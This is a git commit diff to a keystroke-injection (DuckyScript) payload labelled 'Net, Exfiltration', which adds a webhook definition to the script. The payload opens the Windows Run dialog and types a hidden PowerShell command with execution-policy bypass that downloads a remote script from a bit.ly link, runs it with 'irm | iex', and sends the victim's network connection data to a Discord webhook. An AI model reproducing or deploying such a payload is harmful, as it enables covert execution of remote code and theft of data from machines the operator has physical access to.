DEFINE Discord Webhook

pull/206/head
Alessandro 2023-01-11 19:55:13 +01:00 committed by GitHub
parent 3537551291
commit f4e7e520d6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions

View File

@ -28,8 +28,14 @@ REM Category: Net, Exfiltration
REM Requirements: Internet connection
REM
REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass $discord='<your-webhook-here>';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm bit.ly/Windows-netstat | iex
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
STRING';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm bit.ly/Windows-netstat | iex
ENTER